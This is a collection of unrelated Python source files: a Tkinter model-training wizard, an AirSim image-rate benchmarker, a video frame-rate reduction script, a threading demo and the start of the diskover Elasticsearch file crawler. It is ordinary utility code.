self.comb_optimizer.set(model_conf.neu_optimizer_param)
self.learning_rate_spin.set(model_conf.trains_learning_rate)
self.end_acc_val.set(model_conf.trains_end_acc)
self.end_cost_val.set(model_conf.trains_end_cost)
self.end_epochs_spin.set(model_conf.trains_end_epochs)
self.batch_size_val.set(model_conf.batch_size)
self.validation_batch_size_val.set(model_conf.validation_batch_size)
self.binaryzation_val.set(model_conf.binaryzation)
self.median_blur_val.set(model_conf.median_blur)
self.gaussian_blur_val.set(model_conf.gaussian_blur)
if model_conf.equalize_hist:
self.equalize_hist_val.set(1)
if model_conf.laplace:
self.laplace_val.set(1)
if model_conf.warp_perspective:
self.warp_perspective_val.set(1)
self.rotate_val.set(model_conf.rotate)
self.sp_noise_val.set(model_conf.sp_noise)
for dataset_validation in self.get_param(model_conf.validation_path, DatasetType.TFRecords, default=[]):
self.dataset_validation_listbox.insert(tk.END, dataset_validation)
for dataset_train in self.get_param(model_conf.trains_path, DatasetType.TFRecords, default=[]):
self.dataset_train_listbox.insert(tk.END, dataset_train)
return model_conf
@property
def validation_batch_size(self):
if self.dataset_validation_listbox.size() > 1:
return self.validation_batch_size_val.get()
else:
min(self.validation_batch_size_val.get(), self.validation_num_val.get())
def save_conf(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
model_conf = ModelConfig(
project_name=self.current_project,
MemoryUsage=0.7,
CNNNetwork=self.neu_cnn,
RecurrentNetwork=self.neu_recurrent,
UnitsNum=self.units_num_spin.get(),
Optimizer=self.optimizer,
LossFunction=self.loss_func,
Decoder=self.comb_loss.get(),
ModelName=self.current_project,
ModelField=ModelField.Image.value,
ModelScene=ModelScene.Classification.value,
Category=self.category,
Resize=self.resize,
ImageChannel=self.comb_channel.get(),
ImageWidth=self.image_width,
ImageHeight=self.image_height,
MaxLabelNum=self.label_num_spin.get(),
ReplaceTransparent=False,
HorizontalStitching=False,
OutputSplit='',
LabelFrom=LabelFrom.FileName.value,
ExtractRegex='.*?(?=_)',
LabelSplit='',
DatasetTrainsPath=self.dataset_value(
dataset_type=DatasetType.TFRecords, mode=RunMode.Trains
),
DatasetValidationPath=self.dataset_value(
dataset_type=DatasetType.TFRecords, mode=RunMode.Validation
),
SourceTrainPath=self.dataset_value(
dataset_type=DatasetType.Directory, mode=RunMode.Trains
),
SourceValidationPath=self.dataset_value(
dataset_type=DatasetType.Directory, mode=RunMode.Validation
),
ValidationSetNum=self.validation_num_val.get(),
SavedSteps=100,
ValidationSteps=500,
EndAcc=self.end_acc_val.get(),
EndCost=self.end_cost_val.get(),
EndEpochs=self.end_epochs_spin.get(),
BatchSize=self.batch_size_val.get(),
ValidationBatchSize=self.validation_batch_size,
LearningRate=self.learning_rate_spin.get(),
Binaryzation=self.binaryzation_val.get(),
MedianBlur=self.median_blur_val.get(),
GaussianBlur=self.gaussian_blur_val.get(),
EqualizeHist=self.equalize_hist_val.get(),
Laplace=self.laplace_val.get(),
WarpPerspective=self.warp_perspective_val.get(),
Rotate=self.rotate_val.get(),
PepperNoise=self.sp_noise_val.get(),
)
model_conf.update()
return model_conf
def make_dataset(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
self.save_conf()
self.button_state(self.btn_make_dataset, tk.DISABLED)
model_conf = ModelConfig(self.current_project)
train_path = self.dataset_value(DatasetType.Directory, RunMode.Trains)
validation_path = self.dataset_value(DatasetType.Directory, RunMode.Validation)
if len(train_path) < 1:
messagebox.showerror(
"Error!", "{} Sample set has not been added.".format(RunMode.Trains.value)
)
self.button_state(self.btn_make_dataset, tk.NORMAL)
return
self.threading_exec(
lambda: DataSets(model_conf).make_dataset(
trains_path=train_path,
validation_path=validation_path,
is_add=False,
callback=lambda: self.button_state(self.btn_make_dataset, tk.NORMAL),
msg=lambda x: tk.messagebox.showinfo('Make Dataset Status', x)
)
)
@property
def size(self):
return self.json_filter(self.size_val.get(), int)
@property
def image_height(self):
return self.size[1]
@property
def image_width(self):
return self.size[0]
@property
def resize(self):
return self.json_filter(self.resize_val.get(), int)
@property
def neu_cnn(self):
return self.comb_neu_cnn.get()
@property
def neu_recurrent(self):
return self.comb_recurrent.get()
@property
def loss_func(self):
return self.comb_loss.get()
@property
def optimizer(self):
return self.comb_optimizer.get()
@staticmethod
def json_filter(content, item_type):
if not content:
messagebox.showerror(
"Error!", "To select a customized category, you must specify the category set manually."
)
return None
try:
content = json.loads(content)
except ValueError as e:
messagebox.showerror(
"Error!", "Input must be of type JSON."
)
return None
content = [item_type(i) for i in content]
return content
@property
def category(self):
comb_selected = self.comb_category.get()
if not comb_selected:
messagebox.showerror(
"Error!", "Please select built-in category or custom category first"
)
return None
if comb_selected == 'CUSTOMIZED':
category_value = self.category_entry.get()
category_value = self.json_filter(category_value, str)
else:
category_value = comb_selected
return category_value
def dataset_value(self, dataset_type: DatasetType, mode: RunMode):
listbox = self.sample_map[dataset_type][mode]
value = list(listbox.get(0, listbox.size() - 1))
return value
def compile_task(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
model_conf = ModelConfig(project_name=self.current_project)
if not os.path.exists(model_conf.model_root_path):
messagebox.showerror(
"Error", "Model storage folder does not exist."
)
return
if len(os.listdir(model_conf.model_root_path)) < 3:
messagebox.showerror(
"Error", "There is no training model record, please train before compiling."
)
return
try:
self.current_task = Trains(model_conf)
self.current_task.compile_graph(0)
status = 'Compile completed'
except Exception as e:
messagebox.showerror(
e.__class__.__name__, json.dumps(e.args)
)
status = 'Compile failure'
tk.messagebox.showinfo('Compile Status', status)
def compile(self):
self.job = self.threading_exec(
lambda: self.compile_task()
)
def training_task(self):
model_conf = ModelConfig(project_name=self.current_project)
self.current_task = Trains(model_conf)
try:
self.button_state(self.btn_training, tk.DISABLED)
self.button_state(self.btn_stop, tk.NORMAL)
self.is_task_running = True
self.current_task.train_process()
status = 'Training completed'
except Exception as e:
traceback.print_exc()
messagebox.showerror(
e.__class__.__name__, json.dumps(e.args)
)
status = 'Training failure'
self.button_state(self.btn_training, tk.NORMAL)
self.button_state(self.btn_stop, tk.DISABLED)
self.is_task_running = False
tk.messagebox.showinfo('Training Status', status)
@staticmethod
def check_dataset(model_conf):
trains_path = model_conf.trains_path[DatasetType.TFRecords]
validation_path = model_conf.validation_path[DatasetType.TFRecords]
if not trains_path or not validation_path:
messagebox.showerror(
"Error!", "Training set or validation set not defined."
)
return False
for tp in trains_path:
if not os.path.exists(tp):
messagebox.showerror(
"Error!", "Training set path does not exist, please make dataset first"
)
return False
for vp in validation_path:
if not os.path.exists(vp):
messagebox.showerror(
"Error!", "Validation set path does not exist, please make dataset first"
)
return False
return True
def start_training(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
model_conf = self.save_conf()
if not self.check_dataset(model_conf):
return
self.job = self.threading_exec(
lambda: self.training_task()
)
def stop_training(self):
self.current_task.stop_flag = True
self.button_state(self.btn_training, tk.NORMAL)
@property
def project_names(self):
return os.listdir(self.project_root_path)
def fetch_projects(self):
self.comb_project_name['values'] = self.project_names
def browse_dataset(self, dataset_type: DatasetType, mode: RunMode):
if not self.current_project:
messagebox.showerror(
"Error!", "Please define the project name first."
)
return
filename = filedialog.askdirectory()
if not filename:
return
self.sample_map[dataset_type][mode].insert(tk.END, filename)
self.fetch_sample([filename])
@staticmethod
def closest_category(category):
category = set(category)
category_group = dict()
for key in SIMPLE_CATEGORY_MODEL.keys():
category_set = set(category_extract(key))
if category <= category_set:
category_group[key] = len(category_set) - len(category)
min_index = min(category_group.values())
for k, v in category_group.items():
if v == min_index:
return k
def fetch_sample(self, dataset_path):
file_names = os.listdir(dataset_path[0])[0:100]
category = list()
len_label = -1
for file_name in file_names:
if "_" in file_name:
label = file_name.split("_")[0]
label = [i for i in label]
len_label = len(label)
category.extend(label)
category_pram = self.closest_category(category)
self.comb_category.set(category_pram)
size = PilImage.open(os.path.join(dataset_path[0], file_names[0])).size
self.size_val.set(json.dumps(size))
self.resize_val.set(json.dumps(size))
self.label_num_spin.set(len_label)
@staticmethod
def listbox_delete_item_callback(event, listbox: tk.Listbox):
i = listbox.curselection()[0]
listbox.delete(i)
print(i)
def comb_category_callback(self, event):
comb_selected = self.comb_category.get()
if comb_selected == 'CUSTOMIZED':
self.category_entry['state'] = tk.NORMAL
else:
self.category_entry.delete(0, tk.END)
self.category_entry['state'] = tk.DISABLED
@staticmethod
def resource_path(relative_path):
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except AttributeError:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
if __name__ == '__main__':
root = tk.Tk()
app = Wizard(root)
root.mainloop()
|
image_benchmarker.py
|
#!/usr/bin/env python
from argparse import ArgumentParser
from msgpackrpc.error import RPCError
import airsim
import time
import threading
import numpy as np
import cv2
class ImageBenchmarker():
def __init__(self,
img_benchmark_type = 'simGetImage',
viz_image_cv2 = False):
self.airsim_client = airsim.VehicleClient()
self.airsim_client.confirmConnection()
self.image_benchmark_num_images = 0
self.image_benchmark_total_time = 0.0
self.image_callback_thread = None
self.viz_image_cv2 = viz_image_cv2
if img_benchmark_type == "simGetImage":
self.image_callback_thread = threading.Thread(target=self.repeat_timer_img, args=(self.image_callback_benchmark_simGetImage, 0.05))
if img_benchmark_type == "simGetImages":
self.image_callback_thread = threading.Thread(target=self.repeat_timer_img, args=(self.image_callback_benchmark_simGetImages, 0.05))
self.is_image_thread_active = False
def start_img_benchmark_thread(self):
if not self.is_image_thread_active:
self.is_image_thread_active = True
self.image_callback_thread.start()
print("Started img image_callback thread")
def stop_img_benchmark_thread(self):
if self.is_image_thread_active:
self.is_image_thread_active = False
self.image_callback_thread.join()
print("Stopped image callback thread.")
def repeat_timer_img(self, task, period):
while self.is_image_thread_active:
task()
time.sleep(period)
def print_benchmark_results(self):
avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))
print("result: {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))
def image_callback_benchmark_simGetImage(self):
self.image_benchmark_num_images += 1
iter_start_time = time.time()
image = self.airsim_client.simGetImage("fpv_cam", airsim.ImageType.Scene)
np_arr = np.frombuffer(image, dtype=np.uint8)
img_rgb = np_arr.reshape(240, 512, 4)
self.image_benchmark_total_time += time.time() - iter_start_time
avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))
print("result: {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))
# uncomment following lines to viz image
if self.viz_image_cv2:
cv2.imshow("img_rgb", img_rgb)
cv2.waitKey(1)
def image_callback_benchmark_simGetImages(self):
self.image_benchmark_num_images += 1
iter_start_time = time.time()
request = [airsim.ImageRequest("fpv_cam", airsim.ImageType.Scene, False, False)]
try:
response = self.airsim_client.simGetImages(request)
np_arr = np.frombuffer(response[0].image_data_uint8, dtype=np.uint8)
img_rgb = np_arr.reshape(response[0].height, response[0].width, 4)
self.image_benchmark_total_time += time.time() - iter_start_time
avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))
print("result + {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))
# uncomment following lines to viz image
if self.viz_image_cv2:
cv2.imshow("img_rgb", img_rgb)
cv2.waitKey(1)
except RPCError as e:
print("%s" % str(e))
print("Are your camera name & vehicle name correct?")
def main(args):
baseline_racer = ImageBenchmarker(img_benchmark_type=args.img_benchmark_type, viz_image_cv2=args.viz_image_cv2)
baseline_racer.start_img_benchmark_thread()
time.sleep(30)
baseline_racer.stop_img_benchmark_thread()
baseline_racer.print_benchmark_results()
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument('--img_benchmark_type', type=str, choices=["simGetImage", "simGetImages"], default="simGetImages")
parser.add_argument('--enable_viz_image_cv2', dest='viz_image_cv2', action='store_true', default=False)
args = parser.parse_args()
main(args)
|
video_transformer.py
|
import os
import cv2
import numpy as np
import argparse
import shutil
import multiprocessing
from tqdm import tqdm
# command line parser
parser = argparse.ArgumentParser()
parser.add_argument('--videos_folder', type=str, required=True, help='the path to video dataset folder.')
parser.add_argument('--output_folder', type=str, default='../pre_dataset/', help='the path to output dataset folder.')
parser.add_argument('--lower_rate', type=int, default=5, help='lower the video fps by n times.')
args = parser.parse_args()
class DataCreator(object):
def __init__(self):
self.videos_folder = args.videos_folder
self.output_folder = args.output_folder
self.lower_rate = args.lower_rate
self.tmp = '../.tmp/'
try:
os.mkdir(self.tmp)
except:
pass
def _listener(self, pbar, q):
for item in iter(q.get, None):
pbar.update(1)
def _lower_fps(self, p_args):
video_name, q = p_args
# pbar.set_description("Processing %s" % video_name)
# read a video and create video_writer for lower fps video output
video = cv2.VideoCapture(os.path.join(self.videos_folder, video_name))
fps = video.get(cv2.CAP_PROP_FPS)
size = (int(video.get(cv2.CAP_PROP_FRAME_WIDTH)), int(video.get(cv2.CAP_PROP_FRAME_HEIGHT)))
# fourcc = cv2.VideoWriter_fourcc(*'XVID')
fourcc = cv2.VideoWriter_fourcc(*"mp4v")
video_writer = [cv2.VideoWriter(self.tmp + video_name[:-4] + '_%s' % str(i) + '.mp4',
fourcc,
fps / self.lower_rate,
size)
for i in range(self.lower_rate)]
count = 0
while video.isOpened():
ret, frame = video.read()
if ret:
video_writer[count % self.lower_rate].write(frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
raise KeyboardInterrupt
else:
break
count += 1
for i in range(self.lower_rate):
video_writer[i].release()
q.put(1)
def lower_fps(self):
videos_name = os.listdir(self.videos_folder)
pbar = tqdm(total=len(videos_name))
m = multiprocessing.Manager()
q = m.Queue()
listener = multiprocessing.Process(target=self._listener, args=(pbar, q))
listener.start()
p_args = [(video_name, q) for video_name in videos_name]
pool = multiprocessing.Pool()
pool.map(self._lower_fps, p_args)
pool.close()
pool.join()
q.put(None)
listener.join()
def output(self):
os.system('mkdir %s' % self.output_folder)
os.system('cp %s %s' % (self.tmp + '*', self.output_folder))
os.system('rm -rf %s' % self.tmp)
if __name__ == '__main__':
data_creator = DataCreator()
data_creator.lower_fps()
data_creator.output()
|
mtsleepC.py
|
#!/usr/bin/env python
import threading
from time import sleep, ctime
loops = [4,2]
def loop(nloop, nsec):
print('start loop', nloop, 'at:', ctime())
sleep(nsec)
print('loop', nloop, 'done at:', ctime())
def main():
print('starting at:', ctime())
threads = []
nloops = range(len(loops))
for i in nloops:
t = threading.Thread(target = loop, args = (i, loops[i]))
threads.append(t)
for i in nloops:
threads[i].start() #start threads
for i in nloops:
threads[i].join() #wait for all threads to finish
print('all DONE at : ', ctime())
if __name__ == '__main__':
main()
|
diskover.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that index's
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2019
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
from scandir import scandir
from rq import SimpleWorker, Queue
from rq.registry import StartedJobRegistry
from datetime import datetime
from random import randint
try:
import configparser as ConfigParser
except ImportError:
import ConfigParser
from multiprocessing import cpu_count
from threading import Thread, Lock
try:
from queue import Queue as PyQueue
except ImportError:
from Queue import Queue as PyQueue
import progressbar
import argparse
import logging
import importlib
import time
import math
import re
import os
import sys
import json
version = '1.5.0.9'
__version__ = version
IS_PY3 = sys.version_info >= (3, 0)
def print_banner(version):
"""This is the print banner function.
It prints a random banner.
"""
c = randint(1, 4)
if c == 1:
color = '31m'
elif c == 2:
color = '32m'
elif c == 3:
color = '33m'
elif c == 4:
color = '35m'
b = randint(1, 4)
if b == 1:
banner = """\033[%s
________ .__ __
\______ \ |__| _____| | _________ __ ___________
| | \| |/ ___/ |/ / _ \ \/ // __ \_ __ \\ /)___(\\
| ` \ |\___ \| < <_> ) /\ ___/| | \/ (='.'=)
/_______ /__/____ >__|_ \____/ \_/ \___ >__| (\\")_(\\")
\/ \/ \/ \/
v%s
https://shirosaidev.github.io/diskover
Crawling all your stuff.
Support diskover on Patreon or PayPal :)\033[0m
""" % (color, version)
elif b == 2:
banner = """\033[%s
___ ___ ___ ___ ___ ___ ___ ___
/\ \ /\ \ /\ \ /\__\ /\ \ /\__\ /\ \ /\ \\
/::\ \ _\:\ \ /::\ \ /:/ _/_ /::\ \ /:/ _/_ /::\ \ /::\ \\
/:/\:\__\ /\/::\__\ /\:\:\__\ /::-"\__\ /:/\:\__\ |::L/\__\ /::\:\__\ /::\:\__\\
\:\/:/ / \::/\/__/ \:\:\/__/ \;:;-",-" \:\/:/ / |::::/ / \:\:\/ / \;:::/ /
\::/ / \:\__\ \::/ / |:| | \::/ / L;;/__/ \:\/ / |:\/__/
\/__/ \/__/ \/__/ \|__| \/__/ \/__/ \|__|
v%s
https://shirosaidev.github.io/diskover
Bringing light to the darkness.
Support diskover on Patreon or PayPal :)\033[0m
""" % (color, version)
elif b == 3:
banner = """\033[%s
_/_/_/ _/ _/
_/ _/ _/_/_/ _/ _/ _/_/ _/ _/ _/_/ _/ _/_/
_/ _/ _/ _/_/ _/_/ _/ _/ _/ _/ _/_/_/_/ _/_/
_/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/
_/_/_/ _/ _/_/_/ _/ _/ _/_/ _/ _/_/_/ _/
v%s
https://shirosaidev.github.io/diskover
"I didn't even know that was there."
Support diskover on Patreon or PayPal :)\033[0m
""" % (color, version)
elif b == 4:
banner = """\033[%s
__ __
/\ \ __ /\ \\
\_\ \/\_\ ____\ \ \/'\\ ___ __ __ __ _ __ //
/'_` \/\ \ /',__\\\ \ , < / __`\/\ \/\ \ /'__`\/\`'__\\ ('>
/\ \L\ \ \ \/\__, `\\\ \ \\\`\ /\ \L\ \ \ \_/ |/\ __/\ \ \/ /rr
\ \___,_\ \_\/\____/ \ \_\ \_\ \____/\ \___/ \ \____\\\ \\_\\ *\))_
\/__,_ /\/_/\/___/ \/_/\/_/\/___/ \/__/ \/____/ \\/_/
v%s
https://shirosaidev.github.io/diskover
"Holy s*i# there are so many temp files."
Support diskover on Patreon or PayPal :)\033[0m
""" % (color, version)
sys.stdout.write(banner)
sys.stdout.write('\n')
sys.stdout.flush()
def load_config():
"""This is the load config function.
It checks for config file and loads in
the config settings.
"""
configsettings = {}
config = ConfigParser.ConfigParser()
dir_path = os.path.dirname(os.path.realpath(__file__))
# check if env var for config file and use that
try:
configfile = os.environ['DISKOVER_CONFIG']
except KeyError:
configfile = '%s/diskover.cfg' % dir_path
pass
# Check for config file
if not os.path.isfile(configfile):
print('Config file %s not found, exiting.' % configfile)
sys.exit(1)
config.read(configfile)
# Check if any sections missing from config and exit if there is
try:
try:
d = config.get('excludes', 'dirs')
dirs = d.split(',')
configsettings['excluded_dirs'] = set(dirs)
except ConfigParser.NoOptionError:
configsettings['excluded_dirs'] = set([])
try:
f = config.get('excludes', 'files')
files = f.split(',')
configsettings['excluded_files'] = set(files)
except ConfigParser.NoOptionError:
configsettings['excluded_files'] = set([])
try:
d = config.get('includes', 'dirs')
dirs = d.split(',')
configsettings['included_dirs'] = set(dirs)
except (ConfigParser.NoOptionError):
configsettings['included_dirs'] = set([])
try:
f = config.get('includes', 'files')
files = f.split(',')
configsettings['included_files'] = set(files)
except ConfigParser.NoOptionError:
configsettings['included_files'] = set([])
try:
configsettings['ownersgroups_uidgidonly'] = config.get('ownersgroups', 'uidgidonly').lower()
except ConfigParser.NoOptionError:
configsettings['ownersgroups_uidgidonly'] = "false"
try:
configsettings['ownersgroups_domain'] = config.get('ownersgroups', 'domain').lower()
except ConfigParser.NoOptionError:
configsettings['ownersgroups_domain'] = "false"
try:
configsettings['ownersgroups_domainsep'] = config.get('ownersgroups', 'domainsep')
except ConfigParser.NoOptionError:
configsettings['ownersgroups_domainsep'] = "\\"
try:
configsettings['ownersgroups_keepdomain'] = config.get('ownersgroups', 'keepdomain').lower()
except ConfigParser.NoOptionError:
configsettings['ownersgroups_keepdomain'] = "false"
try:
t = config.get('autotag', 'files')
if os.path.isfile("%s/%s" % (os.getcwd(),t)):
atf = json.loads(open("%s/%s" % (os.getcwd(),t)).read())
else:
atf = json.loads(t)
configsettings['autotag_files'] = atf
except ValueError as e:
raise ValueError("Error in config autotag files: %s" % e)
except ConfigParser.NoOptionError:
configsettings['autotag_files'] = []
try:
t = config.get('autotag', 'dirs')
if os.path.isfile("%s/%s" % (os.getcwd(),t)):
atd = json.loads(open("%s/%s" % (os.getcwd(),t)).read())
else:
atd = json.loads(t)
configsettings['autotag_dirs'] = atd
except ValueError as e:
raise ValueError("Error in config autotag dirs: %s" % e)
except ConfigParser.NoOptionError:
configsettings['autotag_dirs'] = []
try:
configsettings['aws'] = config.get('elasticsearch', 'aws').lower()
except ConfigParser.NoOptionError:
configsettings['aws'] = "false"
try:
h = config.get('elasticsearch', 'host')
hosts = h.split(',')
configsettings['es_host'] = hosts
except ConfigParser.NoOptionError:
configsettings['es_host'] = ['localhost']
try:
configsettings['es_port'] = int(config.get('elasticsearch', 'port'))
except ConfigParser.NoOptionError:
configsettings['es_port'] = 9200
try:
configsettings['es_user'] = config.get('elasticsearch', 'user')
except ConfigParser.NoOptionError:
configsettings['es_user'] = ""
try:
configsettings['es_password'] = config.get('elasticsearch', 'password')
except ConfigParser.NoOptionError:
configsettings['es_password'] = ""
try:
configsettings['index'] = config.get('elasticsearch', 'indexname')
except ConfigParser.NoOptionError:
configsettings['index'] = ""
try:
configsettings['es_timeout'] = int(config.get('elasticsearch', 'timeout'))
except ConfigParser.NoOptionError:
configsettings['es_timeout'] = 10
try:
configsettings['es_maxsize'] = int(config.get('elasticsearch', 'maxsize'))
except ConfigParser.NoOptionError:
configsettings['es_maxsize'] = 10
try:
configsettings['es_max_retries'] = int(config.get('elasticsearch', 'maxretries'))
except ConfigParser.NoOptionError:
configsettings['es_max_retries'] = 0
try:
configsettings['es_wait_status_yellow'] = config.get('elasticsearch', 'wait').lower()
except ConfigParser.NoOptionError:
configsettings['es_wait_status_yellow'] = "false"
try:
configsettings['es_chunksize'] = int(config.get('elasticsearch', 'chunksize'))
except ConfigParser.NoOptionError:
configsettings['es_chunksize'] = 500
try:
configsettings['index_shards'] = int(config.get('elasticsearch', 'shards'))
except ConfigParser.NoOptionError:
configsettings['index_shards'] = 5
try:
configsettings['index_replicas'] = int(config.get('elasticsearch', 'replicas'))
except ConfigParser.NoOptionError:
configsettings['index_replicas'] = 1
try:
configsettings['index_refresh'] = config.get('elasticsearch', 'indexrefresh')
except ConfigParser.NoOptionError:
configsettings['index_refresh'] = "1s"
try:
configsettings['disable_replicas'] = config.get('elasticsearch', 'disablereplicas').lower()
except ConfigParser.NoOptionError:
configsettings['disable_replicas'] = "false"
try:
configsettings['index_translog_size'] = config.get('elasticsearch', 'translogsize')
except ConfigParser.NoOptionError:
configsettings['index_translog_size'] = "512mb"
try:
configsettings['es_scrollsize'] = int(config.get('elasticsearch', 'scrollsize'))
except ConfigParser.NoOptionError:
configsettings['es_scrollsize'] = 100
try:
configsettings['redis_host'] = config.get('redis', 'host')
except ConfigParser.NoOptionError:
configsettings['redis_host'] = "localhost"
try:
configsettings['redis_port'] = int(config.get('redis', 'port'))
except ConfigParser.NoOptionError:
configsettings['redis_port'] = 6379
try:
configsettings['redis_socket'] = config.get('redis', 'socket')
except ConfigParser.NoOptionError:
configsettings['redis_socket'] = ""
try:
configsettings['redis_password'] = config.get('redis', 'password')
except ConfigParser.NoOptionError:
configsettings['redis_password'] = ""
try:
configsettings['redis_db'] = int(config.get('redis', 'db'))
except ConfigParser.NoOptionError:
configsettings['redis_db'] = 0
try:
configsettings['redis_rq_timeout'] = int(config.get('redis', 'timeout'))
except ConfigParser.NoOptionError:
configsettings['redis_rq_timeout'] = 180
try:
configsettings['redis_ttl'] = int(config.get('redis', 'ttl'))
except ConfigParser.NoOptionError:
configsettings['redis_ttl'] = 500
try:
configsettings['redis_queue'] = config.get('redis', 'queue')
except ConfigParser.NoOptionError:
configsettings['redis_queue'] = "diskover"
try:
configsettings['redis_queue_crawl'] = config.get('redis', 'queuecrawl')
except ConfigParser.NoOptionError:
configsettings['redis_queue_crawl'] = "diskover_crawl"
try:
configsettings['redis_queue_calcdir'] = config.get('redis', 'queuecalcdir')
except ConfigParser.NoOptionError:
configsettings['redis_queue_calcdir'] = "diskover_calcdir"
try:
configsettings['adaptivebatch_startsize'] = int(config.get('adaptivebatch', 'startsize'))
except ConfigParser.NoOptionError:
configsettings['adaptivebatch_startsize'] = 50
try:
configsettings['adaptivebatch_maxsize'] = int(config.get('adaptivebatch', 'maxsize'))
except ConfigParser.NoOptionError:
configsettings['autobatch_maxsize'] = 500
try:
configsettings['adaptivebatch_stepsize'] = int(config.get('adaptivebatch', 'stepsize'))
except ConfigParser.NoOptionError:
configsettings['adaptivebatch_stepsize'] = 10
try:
configsettings['adaptivebatch_maxfiles'] = int(config.get('adaptivebatch', 'maxfiles'))
except ConfigParser.NoOptionError:
configsettings['adaptivebatch_maxfiles'] = 50000
try:
configsettings['listener_host'] = config.get('socketlistener', 'host')
except ConfigParser.NoOptionError:
configsettings['listener_host'] = "localhost"
try:
configsettings['listener_port'] = int(config.get('socketlistener', 'port'))
except ConfigParser.NoOptionError:
configsettings['listener_port'] = 9999
try:
configsettings['listener_maxconnections'] = int(config.get('socketlistener', 'maxconnections'))
except ConfigParser.NoOptionError:
configsettings['listener_maxconnections'] = 5
try:
configsettings['listener_twcport'] = int(config.get('socketlistener', 'twcport'))
except ConfigParser.NoOptionError:
configsettings['listener_twcport'] = 9998
try:
configsettings['diskover_path'] = config.get('paths', 'diskoverpath')
except ConfigParser.NoOptionError:
configsettings['diskover_path'] = "./diskover.py"
try:
configsettings['python_path'] = config.get('paths', 'pythonpath')
except ConfigParser.NoOptionError:
configsettings['python_path'] = "python"
try:
configsettings['md5_readsize'] = int(config.get('dupescheck', 'readsize'))
except ConfigParser.NoOptionError:
configsettings['md5_readsize'] = 65536
try:
configsettings['dupes_maxsize'] = int(config.get('dupescheck', 'maxsize'))
except ConfigParser.NoOptionError:
configsettings['dupes_maxsize'] = 1073741824
try:
configsettings['dupes_checkbytes'] = int(config.get('dupescheck', 'checkbytes'))
except ConfigParser.NoOptionError:
configsettings['dupes_checkbytes'] = 64
try:
configsettings['dupes_restoretimes'] = config.get('dupescheck', 'restoretimes').lower()
except ConfigParser.NoOptionError:
configsettings['dupes_restoretimes'] = "false"
try:
configsettings['dupes_threads'] = int(config.get('dupescheck', 'threads'))
except ConfigParser.NoOptionError:
configsettings['dupes_threads'] = 8
try:
configsettings['gource_maxfilelag'] = float(config.get('gource', 'maxfilelag'))
except ConfigParser.NoOptionError:
configsettings['gource_maxfilelag'] = 5
try:
configsettings['api_url'] = config.get('crawlapi', 'url')
except ConfigParser.NoOptionError:
configsettings['api_url'] = ""
try:
configsettings['api_user'] = config.get('crawlapi', 'user')
except ConfigParser.NoOptionError:
configsettings['api_user'] = ""
try:
configsettings['api_password'] = config.get('crawlapi', 'password')
except ConfigParser.NoOptionError:
configsettings['api_password'] = ""
try:
configsettings['api_pagesize'] = config.get('crawlapi', 'pagesize')
except ConfigParser.NoOptionError:
configsettings['api_pagesize'] = ""
except ConfigParser.NoSectionError as e:
print('Missing section from diskover.cfg, check diskover.cfg.sample and copy over, exiting. (%s)' % e)
sys.exit(1)
return configsettings, configfile
def get_plugins_info():
"""This is the get plugins info function.
It gets a list of python plugins info (modules) in
the plugins directory and returns the plugins information.
"""
plugin_dir = os.path.dirname(os.path.realpath(__file__)) + "/plugins"
main_module = "__init__"
plugins_info = []
possible_plugins = os.listdir(plugin_dir)
for i in possible_plugins:
location = os.path.join(plugin_dir, i)
if not os.path.isdir(location) or not main_module + ".py" \
in os.listdir(location):
continue
if IS_PY3:
spec = importlib.machinery.PathFinder().find_spec(main_module, [location])
else:
import imp
spec = imp.find_module(main_module, [location])
plugins_info.append({"name": i, "spec": spec})
return plugins_info
def load_plugins():
"""This is the load plugins function.
It dynamically load the plugins and return them in a list
"""
loaded_plugins = []
plugins_info = get_plugins_info()
for plugin_info in plugins_info:
if IS_PY3:
plugin_module = importlib.util.module_from_spec(plugin_info["spec"])
plugin_info["spec"].loader.exec_module(plugin_module)
else:
import imp
plugin_module = imp.load_module(plugin_info["name"], *plugin_info["spec"])
loaded_plugins.append(plugin_module)
return loaded_plugins
def list_plugins():
"""This is the list plugins function.
It prints the name of all the available plugins
"""
plugins_info = get_plugins_info()
for plugin_info in plugins_info:
print(plugin_info["name"])
def user_prompt(question):
""" Prompt the yes/no-*question* to the user. """
from distutils.util import strtobool
while True:
try:
if IS_PY3:
user_input = input(question + " [y/n]: ").lower()
else:
user_input = raw_input(question + " [y/n]: ").lower()
result = strtobool(user_input)
return result
except ValueError:
print("Please use y/n or yes/no.\n")
except KeyboardInterrupt:
print("Ctrl-c keyboard interrupt, shutting down...")
sys.exit(0)
def index_create(indexname):
"""This is the es index create function.
It checks for existing index and deletes if
there is one with same name. It also creates
the new index and sets up mappings.
"""
logger.info('Checking es index: %s', indexname)
# check for existing es index
if es.indices.exists(index=indexname):
# check if reindex cli argument and don't delete existing index
if cliargs['reindex']:
logger.info('Reindexing (non-recursive, preserving tags)')
return
elif cliargs['reindexrecurs']:
logger.info('Reindexing (recursive, preserving tags)')
return
# delete existing index
else:
if cliargs['forcedropexisting']:
logger.warning('es index exists, deleting')
es.indices.delete(index=indexname, ignore=[400, 404])
else:
if user_prompt("Drop existing index?"):
logger.warning('es index exists, deleting')
es.indices.delete(index=indexname, ignore=[400, 404])
else:
logger.info("Cannot continue with index. Exiting.")
sys.exit(1)
